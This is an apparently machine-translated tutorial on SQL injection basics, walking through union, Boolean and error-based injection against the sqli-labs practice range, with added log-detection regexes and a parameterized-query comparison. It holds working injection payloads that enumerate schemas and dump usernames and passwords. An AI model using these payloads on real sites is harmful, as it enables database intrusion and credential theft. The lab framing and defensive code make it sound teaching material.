
What are the basic knowledge points of SQL injection in web security

2025-01-19 Update From: SLTechnology News&Howtos


Shulou(Shulou.com)05/31 Report--

This article introduces the basic knowledge points of SQL injection in web security. The editor walks through the process with an actual case; the method is simple, fast and practical. I hope this article helps you solve the problem.

SQL injection basics

SQL injection takes place within the web request/response process, as described below.

What is SQL injection?

SQL injection occurs when a web application does not validate the data entered by the user: the parameters passed from the front end to the back end are controllable by the attacker and are carried into a database query, so the attacker can construct different SQL statements and perform arbitrary operations on the database.

Why does SQL injection occur?

Developers use dynamic SQL statements to build generic and flexible applications. A dynamic SQL statement is constructed at run time, producing different SQL according to different conditions. Building SQL dynamically is useful when the developer needs to decide which fields to extract (for example in a SELECT statement) according to different query criteria, or to select different tables according to different conditions.

An example PHP statement:

$query = "SELECT * FROM users WHERE id = {$_GET['id']}";

Because the parameter id is controllable and is carried into the database query, a malicious user can concatenate arbitrary SQL into the statement to attack.

The principle of SQL injection: which two conditions must be met for a SQL injection vulnerability to exist?

Parameters can be controlled by the user: the content of the parameters transmitted from the front end to the back end can be controlled by the user.

Parameters are carried into the database query: the passed parameters are concatenated into the SQL statement and carried into the database query.

When the id parameter is 1', the code executed by the database is as follows.

Select * from users where id = 1'

This will report an error because it does not conform to the database syntax specification.

When the id parameter passed in is 1 and 1=1, the SQL statement executed is as follows.

Select * from users where id = 1 and 1=1

Because 1=1 is true and id=1 is true in the WHERE clause, the page returns the same result as for id=1.

When the id parameter passed in is 1 and 1=2, the condition is false because 1=2 does not hold, and the page returns a different result from id=1.

As a result, it can be preliminarily judged that the id parameter has a SQL injection vulnerability, and an attacker can further splice SQL statements to attack, resulting in database information disclosure and possibly further access to server permissions.

In the real environment, SQL injection vulnerabilities may exist in any parameters that meet the above two conditions, so developers should adhere to the principle that "external parameters are unreliable".

Knowledge points related to MySQL injection

MySQL database

The structure of a MySQL server as seen from the websites it hosts:

Database A = website A -> table name -> column name -> data

Database B = website B

Since MySQL 5.0, MySQL stores by default a database named information_schema, in which readers need to remember three table names:

SCHEMATA, TABLES, COLUMNS

The SCHEMATA table stores the names of all databases created by this user; the field holding the database name in this table is SCHEMA_NAME.

The TABLES table stores the database name and table name of every table created by the user; the fields recording the database name and table name are TABLE_SCHEMA and TABLE_NAME respectively.

The COLUMNS table stores the database name, table name and column name of every column; the field names are TABLE_SCHEMA, TABLE_NAME and COLUMN_NAME.

MySQL query statements

When no condition is known, the statement looks like this:

SELECT <field to query> FROM <database name>.<table name>

When one condition is known, the statement looks like this:

SELECT <field to query> FROM <database name>.<table name> WHERE <field of known condition> = '<value of known condition>'

When two conditions are known, the statement looks like this:

SELECT <field to query> FROM <database name>.<table name> WHERE <field of known condition 1> = '<value of known condition 1>' AND <field of known condition 2> = '<value of known condition 2>'

The usage of LIMIT

The format of LIMIT is limit m,n, where m is the position at which to start (counting from 0, so 0 is the first record) and n is the number of records to fetch.

For example, limit 0,1 means take one record starting from the first record.

A few functions to remember

database(): the database used by the current website

version(): the current MySQL version

user(): the current MySQL user

Comment symbols

In MySQL, the common comment forms are: #, -- followed by a space, or /* */.

Inline comments

The form of an inline comment is /*! code */. Inline comments can be used throughout a SQL statement, and MySQL still executes the code inside them. Here is an example:

index.php?id=-15 /*!UNION*/ /*!SELECT*/ 1

Union (joint) injection attack

Practice range (sqli-labs)

http://127.0.0.1/sqli-labs/Less-1/?id=1

First, determine whether (') is used as the string quotation mark.

http://127.0.0.1/sqli-labs/Less-1/?id=1' and 1=1--+

Https://blog.csdn.net/qq_41630808/article/details/80570197

Normal output.

If an error is returned instead, the quotation mark was not closed, which means ' is not the delimiter; " or () may be in use.

http://127.0.0.1/sqli-labs/Less-1/?id=1%27%20and%201=2--+

This confirms a single-quote (') string injection.

Second, determine how many columns the query has.

http://127.0.0.1/sqli-labs/Less-1/?id=1' order by 3--+ (tests whether there are three columns)

Normal

http://127.0.0.1/sqli-labs/Less-1/?id=1' order by 4--+ (tests whether there are four columns)

Error

This shows that the query whose output is displayed has three columns.

Third, determine which columns of the query are displayed on the page.

http://127.0.0.1/sqli-labs/Less-1/?id=-1' union select 1,2,3--+

The page then shows "Your Login name" from the second column and "Your Password" from the third column.

I choose to output what I want in the second column.

Fourth, find out the current user and its privileges.

http://127.0.0.1/sqli-labs/Less-1/?id=-1' union select 1,user(),3--+

The user is root.

5. Find the current database

http://127.0.0.1/sqli-labs/Less-1/?id=-1' union select 1,database(),3--+

The current database is security.

6. Find the table names in security

http://127.0.0.1/sqli-labs/Less-1/?id=-1' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='security'),3--+

The table names are emails, referers, uagents, users.

group_concat() gathers the rows that belong to the same group and displays them together in one column; which column is returned is determined by the function's parameter (that is, the field name).

7. Find the fields in users

http://127.0.0.1/sqli-labs/Less-1/?id=-1' union select 1,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),3--+

8. Find the user names

http://127.0.0.1/sqli-labs/Less-1/?id=-1' union select 1,(select group_concat(username) from security.users),3--+

9. Find the passwords

http://127.0.0.1/sqli-labs/Less-1/?id=-1' union select 1,(select group_concat(password) from security.users),3--+

With that, it is done; I've got the accounts and passwords.
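From the defender's side, the walkthrough above leaves a recognisable trail in the web server's access log: a quote/boolean probe, ORDER BY column counting, UNION SELECT, information_schema and group_concat enumeration, and database()/user() fingerprinting. The following Python detector is an added example, not code from the original article or from sqli-labs; the log lines are constructed, and the combined-log layout and the signature names are assumptions.

```python
import re
from urllib.parse import unquote_plus

# Constructed access-log lines mirroring the sqli-labs walkthrough above
# (assumed Apache/nginx combined-log layout; not a real capture).
SAMPLE_LOG = """\
10.0.0.5 - - [31/May/2019:10:00:01 +0800] "GET /sqli-labs/Less-1/?id=1 HTTP/1.1" 200 512
10.0.0.5 - - [31/May/2019:10:00:07 +0800] "GET /sqli-labs/Less-1/?id=1%27%20and%201=2--+ HTTP/1.1" 200 400
10.0.0.5 - - [31/May/2019:10:00:12 +0800] "GET /sqli-labs/Less-1/?id=1%27%20order%20by%204--+ HTTP/1.1" 500 380
10.0.0.5 - - [31/May/2019:10:00:20 +0800] "GET /sqli-labs/Less-1/?id=-1%27%20union%20select%201,database(),3--+ HTTP/1.1" 200 520
10.0.0.5 - - [31/May/2019:10:00:31 +0800] "GET /sqli-labs/Less-1/?id=-1%27%20union%20select%201,(select%20group_concat(table_name)%20from%20information_schema.tables),3--+ HTTP/1.1" 200 600
10.0.0.9 - - [31/May/2019:10:01:00 +0800] "GET /sqli-labs/Less-1/?id=2 HTTP/1.1" 200 512
"""

# One signature per stage of the walkthrough: boolean probe, ORDER BY column
# counting, UNION SELECT, information_schema/group_concat enumeration and
# database()/user()/version() fingerprinting (stage names are assumed).
SIGNATURES = {
    "boolean_probe": re.compile(r"\b(and|or)\s+\d+\s*=\s*\d+", re.I),
    "column_count": re.compile(r"\border\s+by\s+\d+", re.I),
    "union_select": re.compile(r"\bunion\s+select\b", re.I),
    "schema_enum": re.compile(r"information_schema\.|group_concat\s*\(", re.I),
    "fingerprint": re.compile(r"\b(database|user|version)\s*\(\s*\)", re.I),
}
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) ')

def classify_request(raw_url):
    # URL-decode once so the signatures see what the SQL engine saw (%27 -> ', + -> space),
    # then drop /*! ... */ wrappers so the inline-comment form /*!UNION*/ /*!SELECT*/ reads as UNION SELECT.
    decoded = unquote_plus(raw_url)
    decoded = re.sub(r"/\*!\s*(.*?)\s*\*/", r"\1", decoded)
    return sorted(name for name, rx in SIGNATURES.items() if rx.search(decoded))

def scan_log(text):
    # Map each client IP to the ordered list of distinct stages it triggered;
    # one client walking several stages in sequence is the strongest signal.
    hits = {}
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, url = m.groups()
        for stage in classify_request(url):
            stages = hits.setdefault(ip, [])
            if stage not in stages:
                stages.append(stage)
    return hits
```

Running scan_log(SAMPLE_LOG) reports only 10.0.0.5, with all five stages in the order the client reached them.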

Union (joint) injection code analysis

In the Union injection page, the program gets the GET parameter id, splices it into the SQL statement, queries the database for the rows matching that id, and then outputs the username and address from the first row of the result to the page.

Because the data is output to the page, other data can be queried using a UNION statement, as follows:

Figure (Union injection page source code): http://ww1.sinaimg.cn/large/007bHQE8gy1g58le58wz5j30ou0bo77h.jpg

When id=1 union select 1,2,3 is accessed, the SQL statement executed is:

select * from users where `id`=1 union select 1,2,3

At this point the SQL statement can be divided into two parts: select * from users where `id`=1 and union select 1,2,3. The data in the database can be obtained through the second part (the UNION query).

(To do: add the SQL statement execution code to the source code above.)

Boolean (Boolean) injection attack

1' and length(database())>=1--+ // determine the length of the database name

1' and substr(database(),1,1)='t'--+ // determine the first letter of the database name

1' and substr(database(),2,1)='q'--+ // determine the second letter of the database name

1' and ord(substr(database(),1,1))=115--+ // use ord and the ASCII code to determine the database name

1' and substr(database(),2,1)='q'--+ // use substr to determine the database name

1' and substr((select table_name from information_schema.tables where table_schema='sql' limit 0,1),1,1)='e'--+ // use substr to determine a table name of the database

1. length(str): returns the length of the string str.

2. substr(str, pos, len): takes len characters from str starting at position pos and returns them. Note that pos starts at 1 here, not at 0 as in arrays.

3. mid(str, pos, len): same as above, extracts a substring.

4. ascii(str): returns the ASCII code of the leftmost character of the string str.

5. ord(str): same as above, returns the ASCII code.

6. if(a, b, c): a is the condition; if a is true, b is returned, otherwise c is returned. For example, if(1>2,1,0) returns 0.

Boolean (Boolean) injection code analysis

In the Boolean injection page, the program first obtains the GET parameter id and uses preg_match to check for dangerous keywords such as union, sleep and benchmark. It then concatenates the parameter id into the SQL statement and queries the database.

When id=1' or 1=1%23 is accessed, the statement executed by the database is select * from users where `id`='1' or 1=1#. Since or 1=1 is always true, the page returns normally. When id=1' and '1'='2'%23 is accessed,

the statement executed by the database is select * from users where `id`='1' and '1'='2'#, and since and '1'='2' is always false, the page will return an error.
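The concatenated query from the PHP example at the start of the article and the preg_match keyword filter described in this Boolean injection analysis can be put side by side with a prepared statement to see which of the two conditions each one leaves open. This is an added Python example, not the original page's code: it assumes an in-memory SQLite table in place of MySQL, and the three rows of sample data are constructed.

```python
import re
import sqlite3

# Constructed stand-in for the walkthrough's security.users table
# (SQLite in memory is assumed in place of MySQL; the splicing bug is the same).
SAMPLE_USERS = [(1, "Dumb", "Dumb"), (2, "Angelina", "I-kill-you"), (3, "Dummy", "p@ssword")]

def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", SAMPLE_USERS)
    return conn

def vulnerable_lookup(conn, user_id):
    # Both conditions from the article hold: the parameter is user-controlled and
    # it is spliced into the query text, exactly like "... WHERE id = '$id'".
    sql = f"SELECT username FROM users WHERE id = '{user_id}'"
    return [row[0] for row in conn.execute(sql)]

# The preg_match-style keyword filter from the Boolean injection code analysis.
BLACKLIST = re.compile(r"union|sleep|benchmark", re.IGNORECASE)

def blacklisted_lookup(conn, user_id):
    # Blocks a few keywords but still splices: "and 1=1" / "and 1=2" pass straight
    # through, which is why the page can still be probed with Boolean conditions.
    if BLACKLIST.search(user_id):
        return None
    return vulnerable_lookup(conn, user_id)

def safe_lookup(conn, user_id):
    # Prepared statement: the value is bound as data and never parsed as SQL,
    # so condition two ("parameter enters the query text") no longer holds.
    sql = "SELECT username FROM users WHERE id = ?"
    return [row[0] for row in conn.execute(sql, (user_id,))]

def demo():
    # Run the three handlers on a normal id and on the page's own Boolean probes.
    conn = make_db()
    probes = ["1", "1' and 1=1 -- ", "1' and 1=2 -- ", "1' or 1=1 -- "]
    return {p: (vulnerable_lookup(conn, p), blacklisted_lookup(conn, p), safe_lookup(conn, p))
            for p in probes}

if __name__ == "__main__":
    for probe, (vuln, filtered, safe) in demo().items():
        print(f"{probe!r:20} vulnerable={vuln} blacklisted={filtered} safe={safe}")
```

The spliced and blacklisted handlers return different rows for 1=1 and 1=2 (the Boolean oracle) and every row for or 1=1, while the prepared statement returns nothing for any of the probes because the whole string is compared against id as a value.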

Error injection attack

' and updatexml(1,concat(0x7e,(select user()),0x7e),1)--+ // use updatexml to get user()

' and updatexml(1,concat(0x7e,(select database()),0x7e),1)--+ // use updatexml to get database()

' and updatexml(1,concat(0x7e,(select schema_name from information_schema.schemata limit 0,1),0x7e),1)--+ // obtain a database name using error-based injection

' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='test' limit 0,1),0x7e),1)--+ // obtain a table name of the database using error-based injection

Analysis of the error injection attack code

On the error injection page, the program obtains the GET parameter username, splices the username into the SQL statement, and then queries the database.

Figure (error injection page source code): http://ww1.sinaimg.cn/large/007bHQE8gy1g58lsi2dz3j30ua0a9419.jpg

When username=1' is entered, the SQL statement becomes select * from users where `username`='1''. An error is reported during execution because of the extra single quotation mark. With this error echo, the contents of a query can be output to the page through functions such as floor() and updatexml().

This is the end of the content about "what are the basic knowledge points of SQL injection in web security". Thank you for reading.
